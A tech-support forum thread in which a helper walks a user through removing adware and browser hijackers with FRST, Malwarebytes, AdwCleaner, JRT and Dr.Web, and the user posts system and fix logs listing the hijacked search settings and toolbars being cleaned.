Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.


System errors:
=============
Error: (03/08/2016 10:24:37 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/08/2016 10:21:42 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: App

Error: (03/08/2016 10:21:16 PM) (Source: DCOM) (EventID: 10001) (User: DURABLE)
Description: "C:\WINDOWS\System32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider31Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProviderUnavailableUnavailable

Error: (03/08/2016 10:18:10 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Security Center service hung on starting.

Error: (03/08/2016 10:18:06 PM) (Source: DCOM) (EventID: 10001) (User: DURABLE)
Description: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca31CortanaUI.AppXtpp90jhw9p0njjb85kvhxpppgrqfp117.mcaUnavailableUnavailable

Error: (03/08/2016 10:18:06 PM) (Source: DCOM) (EventID: 10001) (User: DURABLE)
Description: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca31CortanaUI.AppXn73w0hsq3g4wx1h9fhf7q02vw2wta6qc.mcaUnavailableUnavailable

Error: (03/08/2016 10:16:05 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Intel® Management & Security Application User Notification Service service hung on starting.

Error: (03/08/2016 10:13:56 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Delivery Optimization service hung on starting.

Error: (03/08/2016 10:09:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Net.Pipe Listener Adapter service failed to start due to the following error:
%%1053

Error: (03/08/2016 10:09:37 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Net.Pipe Listener Adapter service to connect.


CodeIntegrity:
===================================
  Date: 2016-03-08 23:00:05.241
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 23:00:05.120
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:49.432
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:49.316
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:49.181
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:49.034
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:48.903
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:48.774
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:43.470
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:43.270
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 520 @ 2.40GHz
Percentage of memory in use: 67%
Total physical RAM: 3890.67 MB
Available physical RAM: 1259.89 MB
Total Virtual: 8754.67 MB
Available Virtual: 5904.86 MB

==================== Drives ================================

Drive c: (TI105835W0O) (Fixed) (Total:453.17 GB) (Free:105.28 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: E56E3D6C)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=453.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=511 MB) - (Type=27)
Partition 4: (Not Active) - (Size=10.6 GB) - (Type=17)

==================== End of Addition.txt ============================


Thanks for those logs, you do not mention if system restore was completed successfully?

 

Next,

 

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.
NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt) or the folder it was run from. Please post it to your reply.

 

Next,

 

Please open Malwarebytes Anti-Malware.

  • On the Settings tab > Detection and Protection sub tab, Detection Options, tick the box "Scan for rootkits".
  • Under Non-Malware Protection sub tab Change PUP and PUM entries to Treat detections as Malware
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete Apply Actions to any found entries.
  • Wait for the prompt to restart the computer to appear (if applicable), then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.


To get the log from Malwarebytes do the following:

  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click Export > From export you have three options:

      Copy to Clipboard - if selected, right click to your reply and select "Paste"; the log will be pasted to your reply
      Text file (*.txt)        - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply
      XML file (*.xml)      - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply
  • Please use "Copy to Clipboard", then right click to your reply > select "Paste"; that will copy the log to your reply…


 

Next,

 

Download AdwCleaner by Xplode onto your Desktop.

  • Double click on Adwcleaner.exe to run the tool.
  • Click on the Scan in the Actions box
  • Please wait for the scan to finish..
  • When "Waiting for action.Please uncheck elements you want to keep" shows in top line..
  • Click on the Cleaning box.
  • Next click OK on the "Closing Programs" pop up box.
  • Click OK on the Information box & again OK to allow the necessary reboot
  • After restart the AdwCleaner(C*)-Notepad log will appear, please copy/paste it in your next reply. Where * is the number relative to list of scans completed...

 
Next,
 
Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts. (re-enable when done)
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

 

Next,

 

Download Dr Web Cureit from here http://www.freedrweb.com/cureit save to your desktop. (Scroll to bottom of page)

  • The file will be randomly named
  • Reboot to safe mode <<<<<------------ http://www.computerhope.com/issues/chsafe.htm
  • Run Dr Web
  • Tick the I agree box and select continue
  • Click select objects for scanning



  • Tick all boxes as shown
  • Click the wrench and select automatically apply actions to threats



  • Press start scan
  • The scan will now commence



  • Once the scan has finished click open report <<<--- Do not miss this step



  • A notepad will open
  • Select File > Save as..
  • Save it to your desktop



This log will be excessive, please attach it to your next reply…
 

Let me see those logs, also give an update on any remaining issues or concerns....

 

Thank you.

 

Kevin

Fixlist.txt


I believe the restore was successful.  I am not noting any of the same problems.  I am attaching the first log after the fix here and moving on to Malwarebytes.  Thank you for your continued help. 

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by Lexi (2016-03-09 10:01:31) Run:1
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
KU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
URLSearchHook: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 - (No Name) - {8bdea9d6-6f62-45eb-8ee9-8a81af0d2f94} - No File
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM-x32 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2EDC592E-BE3B-45E6-9A09-3818FD7629D6} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=&apn_dtid=OSJ000&apn_uid=6B700B84-D3AD-42B9-8117-AA8044508D55&apn_sauid=7FF7FD87-FFF2-42ED-8F75-9A7D9889C78F
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL =
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?q={SEARCHTERMS}&o=15527&l=dis&prt=360&chn=retail&geo=US&ver=4
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3298582&CUI=UN25864562382803126&UM=2
BHO-x32: No Name -> {9D425283-D487-4337-BAB6-AB8354A81457} -> No File
BHO-x32: Fast Free Converter 4.1 -> {F5580E24-8416-4DFD-90B3-078D4EDF4FCB} -> C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\FastFreeConverter.dll [2013-11-21] (Fast Free Converter)
Toolbar: HKLM-x32 - Secure Online Account Numbers - {A8C7C2CA-6DFD-4E16-8458-592361564D38} - C:\Program Files (x86)\Discover\SOAN\DiscoverSOANToolbar.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
Toolbar: HKLM-x32 - No Name - {9D425283-D487-4337-BAB6-AB8354A81457} -  No File
Toolbar: HKLM-x32 - MixiDJ V46 Toolbar - {62cad681-699f-4f83-b87f-95584003592f} - C:\Program Files (x86)\MixiDJ_V46\prxtbMixi.dll [2013-05-16] ()
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {9D425283-D487-4337-BAB6-AB8354A81457} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {62CAD681-699F-4F83-B87F-95584003592F} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {A13C2648-91D4-4BF3-BC6D-0079707C4389} -  No File
DPF: HKLM-x32 {2FF8D282-F78A-4A33-ABC2-49E72A341482} hxxp://riteaid.storefront.com/images/global/activex/SFImageUpload1_10.CAB
DPF: HKLM-x32 {C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F} hxxp://www.ritzpix.com/net/Uploader/LPUploader57.cab
FF Homepage: hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
FF HKLM-x32\...\Firefox\Extensions: [extension@Fast_Free_Converter.com] - C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com
FF Extension: No Name - C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com [2016-03-08] [not signed]
FF HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Firefox\Extensions: [{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}] - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}
FF Extension: XULRunner - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} [2010-09-19] [not signed]
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
2016-03-08 22:04 - 2011-06-14 21:43 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\FunWebProducts
2016-03-08 22:04 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\Conduit
2016-03-08 22:04 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\Local\Conduit
2016-03-08 22:03 - 2013-06-18 14:18 - 00000000 ____D C:\Program Files (x86)\Conduit
2011-09-30 18:11 - 2011-09-30 18:11 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00024cb8).exe
2011-12-24 15:45 - 2011-12-24 15:45 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000321b2).exe
2012-01-25 15:47 - 2012-01-25 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00034114).exe
2011-11-01 21:04 - 2011-11-01 21:04 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0003ec41).exe
2011-10-16 11:32 - 2011-10-16 11:32 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00056cd5).exe
2011-08-13 08:55 - 2011-08-13 08:55 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00073fec).exe
2012-01-26 18:05 - 2012-01-26 18:05 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008252c).exe
2011-09-19 14:57 - 2011-09-19 14:57 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008496e).exe
2011-10-15 12:37 - 2011-10-15 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000b8b3e).exe
2011-09-21 21:26 - 2011-09-21 21:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000c73a9).exe
2011-11-10 10:20 - 2011-11-10 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00130f9a).exe
2011-08-08 18:26 - 2011-08-08 18:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0018976e).exe
2011-10-20 12:37 - 2011-10-20 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00288d51).exe
2012-01-11 16:26 - 2012-01-11 16:26 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(008db6d3).exe
2011-12-20 17:09 - 2011-12-20 17:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00fc1d83).exe
2011-09-14 17:15 - 2011-09-14 17:15 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(013e5cf4).exe
2011-12-20 02:23 - 2011-12-20 02:23 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(01fc745e).exe
2011-09-11 09:14 - 2011-09-11 09:14 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(026211c7).exe
2011-08-31 16:17 - 2011-08-31 16:17 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(0431a317).exe
2011-08-09 13:53 - 2011-08-09 13:53 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(04456972).exe
2011-08-25 12:37 - 2011-08-25 12:37 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(054287ef).exe
2012-01-21 20:50 - 2012-01-21 20:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(05af0912).exe
2011-09-01 10:44 - 2011-09-01 10:44 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0827ae62).exe
2011-10-02 17:23 - 2011-10-02 17:23 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0a233f94).exe
2011-11-18 10:20 - 2011-11-18 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0cc139e7).exe
2011-12-27 20:18 - 2011-12-27 20:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(106fb87b).exe
2011-08-28 06:05 - 2011-08-28 06:05 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(134e6ebe).exe
2012-01-24 15:20 - 2012-01-24 15:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe
2012-01-30 16:56 - 2012-01-30 16:56 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe
2011-12-19 00:06 - 2011-12-19 00:06 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe
2011-08-17 09:36 - 2011-08-17 09:36 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe
2011-09-04 17:44 - 2011-09-04 17:44 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(191ae0ef).exe
2011-11-15 19:36 - 2011-11-15 19:36 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe
2011-08-30 08:09 - 2011-08-30 08:09 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe
2011-11-22 02:21 - 2011-11-22 02:21 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe
2011-12-31 02:31 - 2011-12-31 02:31 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe
2012-01-18 10:47 - 2012-01-18 10:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe
